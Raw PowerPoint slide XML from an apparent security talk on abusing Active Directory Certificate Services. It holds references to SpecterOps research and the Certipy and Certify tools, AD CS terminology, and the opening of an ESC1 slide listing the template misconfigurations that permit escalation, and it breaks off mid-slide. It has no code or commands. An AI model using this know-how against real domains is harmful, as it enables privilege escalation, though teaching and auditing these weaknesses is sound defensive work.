        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1313998" y="1341518"/>
            <a:ext cx="8712967" cy="4174963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2797451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err="1" smtClean="0"/>
              <a:t>References</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de contenido 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="693812" y="1628800"/>
            <a:ext cx="9144000" cy="4267200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.specterops.io/assets/resources/Certified_Pre-Owned.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>posts.specterops.io/certified-pre-owned-d95910965cd2</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>github.com/ly4k/Certipy</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://github.com/GhostPack/Certify</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>speakerdeck.com/heirhabarov/hunting-for-active-directory-certificate-services-abuse</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>www.sysadmins.lv/blog-en/constraining-extended-key-usages-in-microsoft-windows.aspx</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://www.tarlogic.com/blog/ad-cs-manageca-rce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>https://www.tarlogic.com/blog/ad-cs-esc7-attack/</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="220975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err="1" smtClean="0"/>
              <a:t>Thanks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>watching</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Marcador de contenido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27300" y="2436019"/>
            <a:ext cx="6096000" cy="3429000"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36770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dirty="0" smtClean="0"/>
              <a:t>Active </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>Directory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>Certification</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>Services</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de contenido 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>roles introduced in Windows Server 2008 that provides users with customizable services for creating and managing Public Key Infrastructure (PKI) certificates, which can be used for encrypting and digitally signing electronic documents, emails, and messages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is not installed by default, but is widely used.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is not easy to perform a correct configuration, so may be encountered </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>environments </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>with serious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>misconfigurations.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2073852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dirty="0"/>
              <a:t>Active </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Directory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Certification</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Services</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de contenido 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>PKI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (Public Key Infrastructure) — a system to manage certificates/public key encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>AD CS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (Active Directory Certificate Services) — Microsoft’s PKI implementation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>CA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(Certificate Authority) — PKI server that issues certificates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Enterprise CA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> — CA integrated with AD (as opposed to a standalone CA), offers certificate templates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Certificate Template</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> — a collection of settings and policies that defines the contents of a certificate issued by an enterprise CA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>CSR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (Certificate Signing Request) — a message sent to a CA to request a signed certificate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>EKU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (Extended/Enhanced Key Usage) — one or more object identifiers (OIDs) that define how a certificate can be used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2346373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err="1" smtClean="0"/>
              <a:t>Why</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>care</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t>? </a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="CuadroTexto 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2926060" y="6309320"/>
            <a:ext cx="5800306" cy="674031"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>* Hunting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>for Active Directory Certificate Services Abuse </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="es-ES" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Imagen 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="353605" y="1988840"/>
            <a:ext cx="10945216" cy="3210854"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3070297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b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Certificate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Templates</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de contenido 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>AD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CS Enterprise CAs (Certificate authority</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) issue </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>certificates with configurations defined by certificate templates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>These templates </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>are collections of predefined certificate enrollment policies and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>configurations:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> What actions can be allowed to do with the certificate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> Who </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>can claim the certificate? For whom?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> What </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>is the validity of the certificate?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> …</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="432530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S" dirty="0" err="1" smtClean="0"/>
              <a:t>Certificate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>Templates</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Marcador de contenido 5"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4726260" y="1692149"/>
            <a:ext cx="3346519" cy="4195762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Imagen 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="587917" y="1692149"/>
            <a:ext cx="3966790" cy="3354972"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="CuadroTexto 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1197868" y="6399824"/>
            <a:ext cx="9073008" cy="424732"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0" err="1"/>
              <a:t>certtmpl.msc</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Imagen 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8338224" y="1706830"/>
            <a:ext cx="3536037" cy="3742306"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1351490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es-ES" sz="3600" dirty="0" err="1" smtClean="0"/>
              <a:t>Abusing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" dirty="0" smtClean="0"/>
              <a:t> Active </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" dirty="0" err="1" smtClean="0"/>
              <a:t>Directory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="3600" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" dirty="0" err="1" smtClean="0"/>
              <a:t>Certification</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" dirty="0" err="1" smtClean="0"/>
              <a:t>Services</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Marcador de contenido 4"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2998068" y="1772816"/>
            <a:ext cx="5137539" cy="4267200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="CuadroTexto 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124099" y="6165304"/>
            <a:ext cx="4445961" cy="424732"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Certified</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Pre-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Owned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>SpecterOps</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1475690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65820" y="188640"/>
            <a:ext cx="9143998" cy="634082"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t>ESC1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>Client </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0"/>
              <a:t>Authentication and allows the enrollee to supply an arbitrary Subject Alternative Name (SAN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de contenido 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="477788" y="1814596"/>
            <a:ext cx="10729192" cy="5040560"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Enterprise CA grants low-privileged users enrollment </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>rights.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enterprise CA's configuration must permit low-privileged users the ability to request certificates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Manager approval is disabled.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> This setting necessitates that a user with certificate "manager" permissions review and approve the requested certificate before the certificate is issued.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>No </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>authorized signatures are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>required </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
